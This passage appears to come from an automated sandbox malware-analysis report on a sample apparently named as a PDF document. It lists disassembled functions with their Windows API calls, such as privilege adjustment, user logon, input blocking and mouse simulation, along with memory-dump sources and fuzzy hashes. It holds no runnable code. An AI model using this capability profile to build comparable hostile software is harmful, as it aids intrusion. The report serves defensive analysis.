                                                            • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                            • String ID:
                                                            • API String ID: 1922334811-0
                                                            • Opcode ID: 6fb959970c7d7b92aadb6dd28114759614b6977bce0c36c17c1ffb98bb493ea0
                                                            • Instruction ID: 1904090443c1ae80697089d131cd8c16786bc6637c2feeea800dd2f39aeb5839
                                                            • Opcode Fuzzy Hash: 6fb959970c7d7b92aadb6dd28114759614b6977bce0c36c17c1ffb98bb493ea0
                                                            • Instruction Fuzzy Hash: 6A1194B1814205AFD728DF64DC85D7BB7BDFF48710B20852EF45597651DB70AC81CA60
                                                            Function 00154021 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0015404B
                                                            • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00154088
                                                            • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00154091
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                            • String ID:
                                                            • API String ID: 33631002-0
                                                            • Opcode ID: bce14696c9748ce234a056fe62529f80d686801cea1d51ff7f9319e30ab6f4ff
                                                            • Instruction ID: 86ccee5daf21431630e83a6a79e8d02ad4904c9344a31655016747c7ff63eded
                                                            • Opcode Fuzzy Hash: bce14696c9748ce234a056fe62529f80d686801cea1d51ff7f9319e30ab6f4ff
                                                            • Instruction Fuzzy Hash: B51173B1904224FFE7109BE9DC44FABBBBCEB08715F100656BE14E7191C3B4598587A1
                                                            Function 00154C03 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00154C2C
                                                            • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00154C43
                                                            • FreeSid.ADVAPI32(?), ref: 00154C53
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                            • String ID:
                                                            • API String ID: 3429775523-0
                                                            • Opcode ID: 444fcc7a2acc07a7c88c292339cba883f4d3c385d0e8c4da67a5a63abcf46fb3
                                                            • Instruction ID: 9a719a225fee0b071a42c677bc50527df81975bded5a5eeb1ac5df9fedc3f284
                                                            • Opcode Fuzzy Hash: 444fcc7a2acc07a7c88c292339cba883f4d3c385d0e8c4da67a5a63abcf46fb3
                                                            • Instruction Fuzzy Hash: E3F04975A1130CBFDF04DFF0DC89EAEBBBDEF08201F1044A9A905E2681E7706A848B50
                                                            Function 000FE060 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0e00c707b747590794353619a51409d076fada5e1ea8d2b28a00ef9b2ee2b235
                                                            • Instruction ID: 1063cc90c5099ea442b138d236bfe9669b8ee53c3bc287894088e9ccc890495b
                                                            • Opcode Fuzzy Hash: 0e00c707b747590794353619a51409d076fada5e1ea8d2b28a00ef9b2ee2b235
                                                            • Instruction Fuzzy Hash: 7622C070A0025ACFDB24DF54C484ABEF7F1FF08300F148169EA569B7A2E774A985DB91
                                                            Function 0015C93C Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 0015C966
                                                            • FindClose.KERNEL32(00000000), ref: 0015C996
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Find$CloseFileFirst
                                                            • String ID:
                                                            • API String ID: 2295610775-0
                                                            • Opcode ID: c563c63f19a32f5aef2ee0f4be7607a919327667cd53fac7fcbe35a124511606
                                                            • Instruction ID: ae24b8e01d402a4fbd88bbfbb96b1ef71915774ff8aca9ce172851addddf8ef2
                                                            • Opcode Fuzzy Hash: c563c63f19a32f5aef2ee0f4be7607a919327667cd53fac7fcbe35a124511606
                                                            • Instruction Fuzzy Hash: E211A1326046049FD710EF29C845A6AF7E9FF84324F00851EF9A9DB6A1DB30AC05CB81
                                                            Function 0015A2D5 Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0016977D,?,0017FB84,?), ref: 0015A302
                                                            • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0016977D,?,0017FB84,?), ref: 0015A314
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID:
                                                            • API String ID: 3479602957-0
                                                            • Opcode ID: 586f517a3597368b02604e766291a94acd43134c2d8e283d26ee573158d9e6bf
                                                            • Instruction ID: de1df1346027cc56e0d769781144c29e206773aafb7ed222c8e04ac7cb25b811
                                                            • Opcode Fuzzy Hash: 586f517a3597368b02604e766291a94acd43134c2d8e283d26ee573158d9e6bf
                                                            • Instruction Fuzzy Hash: F4F0823558422DFBDB109FA4DC48FFA777DBF08761F004269B918D6191D7309984CBA1
                                                            Function 00148713 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00148851), ref: 00148728
                                                            • CloseHandle.KERNEL32(?,?,00148851), ref: 0014873A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: AdjustCloseHandlePrivilegesToken
                                                            • String ID:
                                                            • API String ID: 81990902-0
                                                            • Opcode ID: 966c24b14c8722628be38da2201026b6269fd5ad70b96e1274b203e2a5f00c32
                                                            • Instruction ID: 687d691659d3fd9171307c33bdcb876d9b85622b23351cf5352085a5a2b7ac49
                                                            • Opcode Fuzzy Hash: 966c24b14c8722628be38da2201026b6269fd5ad70b96e1274b203e2a5f00c32
                                                            • Instruction Fuzzy Hash: EDE0B676410610EEE7252B60EC09DB7BBA9FF04351724883DB59A80870DB62ACD1DB10
                                                            Function 0011A395 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00118F97,?,?,?,00000001), ref: 0011A39A
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0011A3A3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: b121a1f065a65c3cbe8ddea3d368a7ad0cc6f8e19172c871d611dd02929f4225
                                                            • Instruction ID: b53b0e3d924f9c662c30b8e4fbdf5d7ec688f4c1689bdabe38d565b2d622b509
                                                            • Opcode Fuzzy Hash: b121a1f065a65c3cbe8ddea3d368a7ad0cc6f8e19172c871d611dd02929f4225
                                                            • Instruction Fuzzy Hash: D5B09231054208ABCA006B91EC09B8A3F78FB44AAAF404024F60D84860CB6254D2CA91
                                                            Function 0011F419 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77f64afd48677a9bfc06021ff151fc2bd28d8c291709453a256477bfe871360e
                                                            • Instruction ID: 3991468a016a5642fbb59d580b1e221e24a2de296168c2656871e9ec03e6e5ef
                                                            • Opcode Fuzzy Hash: 77f64afd48677a9bfc06021ff151fc2bd28d8c291709453a256477bfe871360e
                                                            • Instruction Fuzzy Hash: B1320235D29F014DD7279634D872335A24AAFB63C4F25D73BE82AB5DA6EB28C5C34200
                                                            Function 0012267E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 59eef11c1d41e5754c05697240fe589472d6bd36c015f358f96e977021c8f765
                                                            • Instruction ID: e9bc40983dcc7cc4185c3a7ecc29f26b64438e47b235fcae44ceed001de81293
                                                            • Opcode Fuzzy Hash: 59eef11c1d41e5754c05697240fe589472d6bd36c015f358f96e977021c8f765
                                                            • Instruction Fuzzy Hash: F3B1DF30D2AF514EE62396398831336BA4CAFBB2C5B95D71BFC1674D22EB2186C34241
                                                            Function 00158B13 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __time64.LIBCMT ref: 00158B25
                                                              • Part of subcall function 0011543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,001591F8,00000000,?,?,?,?,001593A9,00000000,?), ref: 00115443
                                                              • Part of subcall function 0011543A: __aulldiv.LIBCMT ref: 00115463
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                            • String ID:
                                                            • API String ID: 2893107130-0
                                                            • Opcode ID: 2eefae703324a28df988eab54e00312efe712596f29f92801863a521c21c90b7
                                                            • Instruction ID: cd2eef8bed27d09e42c12f0ffe7310765658b9b5dd774fa222aa434f563fbb8b
                                                            • Opcode Fuzzy Hash: 2eefae703324a28df988eab54e00312efe712596f29f92801863a521c21c90b7
                                                            • Instruction Fuzzy Hash: A321D272625510CBC729CF29D841A52B3E5EBA4311B288F6CD4F5CF6D0CB74B945CB94
                                                            Function 001641FD Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • BlockInput.USER32(00000001), ref: 00164218
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: BlockInput
                                                            • String ID:
                                                            • API String ID: 3456056419-0
                                                            • Opcode ID: 82b5ab5684f0b5248f26242d4e4046657ed65050ca1941d9ce6f47e2a82dbbf1
                                                            • Instruction ID: cfb7b24843a65c0ed0c34d5152614bdd639ea35df46b72d66009b24809ae25ef
                                                            • Opcode Fuzzy Hash: 82b5ab5684f0b5248f26242d4e4046657ed65050ca1941d9ce6f47e2a82dbbf1
                                                            • Instruction Fuzzy Hash: 66E04F352402189FC710EF59E844A9AFBE8AF94761F11802AFE49C7752DB70E8918BE1
                                                            Function 00154EC9 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00154EEC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: mouse_event
                                                            • String ID:
                                                            • API String ID: 2434400541-0
                                                            • Opcode ID: 7a80ca92a73635bea51cd906987905895115b9ec0d4b3b25d60fbcc1933a59a9
                                                            • Instruction ID: dace37bc5cd4577826e5b070b8aa5b863667fa55caf69bf010e13b1c567ae734
                                                            • Opcode Fuzzy Hash: 7a80ca92a73635bea51cd906987905895115b9ec0d4b3b25d60fbcc1933a59a9
                                                            • Instruction Fuzzy Hash: 05D01798160604ABE82C8B24985FA770208F30078BF94514AB9628D0C19AB86CE96020
                                                            Function 00148C93 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,001488D1), ref: 00148CB3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: LogonUser
                                                            • String ID:
                                                            • API String ID: 1244722697-0
                                                            • Opcode ID: 5a528cf38021a9c1b81c1bb16df2d41aeb30bad5fedccbfbcb2f4d2370150f1c
                                                            • Instruction ID: b3bd709360f829aff1a2ea6e1770c60196c3efbb2ebe83e26b96c1129452b047
                                                            • Opcode Fuzzy Hash: 5a528cf38021a9c1b81c1bb16df2d41aeb30bad5fedccbfbcb2f4d2370150f1c
                                                            • Instruction Fuzzy Hash: D0D05E3226450EABEF018EA4DC05EAF3B6AEB04B01F508111FE15C61A1C775D835AB60
                                                            Function 00132230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetUserNameW.ADVAPI32(?,?), ref: 00132242
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: NameUser
                                                            • String ID:
                                                            • API String ID: 2645101109-0
                                                            • Opcode ID: 2925a2691877c190fbd7d696404bdee58cd817ff4f9438586f390aaabfba33d7
                                                            • Instruction ID: 62c0f52ac1b9b73e4ac22021a72ce0e5dca43a30817e1c2eb4f9457d0ec20328
                                                            • Opcode Fuzzy Hash: 2925a2691877c190fbd7d696404bdee58cd817ff4f9438586f390aaabfba33d7
                                                            • Instruction Fuzzy Hash: B1C04CF1800109DBDB05DB90D988DEFB7BCAB04315F104055A105F2100D7749B848A71
                                                            Function 0011A364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0011A36A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: 864f1ac7974f384c3327978fd1057199d6eaa366d60b791a898f9dc7a5afe834
                                                            • Instruction ID: bc9fc0dc070590196e99df8a54f1dff33284acb54b1cf3b154ba976037a5e52d
                                                            • Opcode Fuzzy Hash: 864f1ac7974f384c3327978fd1057199d6eaa366d60b791a898f9dc7a5afe834
                                                            • Instruction Fuzzy Hash: B3A0123000010CA78A001B41EC044457F6CE7001947004020F40C40421873254918980
                                                            Function 00108A0E Relevance: .6, Instructions: 608COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4812964801fab11eb50a9dbdae4afbb78457fcad5fe86a8cfc283e696615cee7
                                                            • Instruction ID: cc4d2ebe678ad5e64aab3a769e62289bc869389ca4632b3584ce1f8dae3d3e21
                                                            • Opcode Fuzzy Hash: 4812964801fab11eb50a9dbdae4afbb78457fcad5fe86a8cfc283e696615cee7
                                                            • Instruction Fuzzy Hash: 0D222A3050961ACBEF288F14C5946BD77B2FB42344F65847AD8C68B6E2DBB49D81CB60
                                                            Function 00112405 Relevance: .3, Instructions: 345COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                            • Instruction ID: d5021a8d0fb7c6ec71500aafb1c694ccdce26d221a6b2d43e16e569a8c6bf1fe
                                                            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                            • Instruction Fuzzy Hash: 28C1A2322050930ADF6D863994745BEFAE15EA27B131A077DE8B3CB5C4EF20D5B9D620
                                                            Function 0011283A Relevance: .3, Instructions: 341COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2105521687.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                            • Associated: 00000000.00000002.2105504210.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105572387.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105615097.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2105630232.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f0000_docs_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
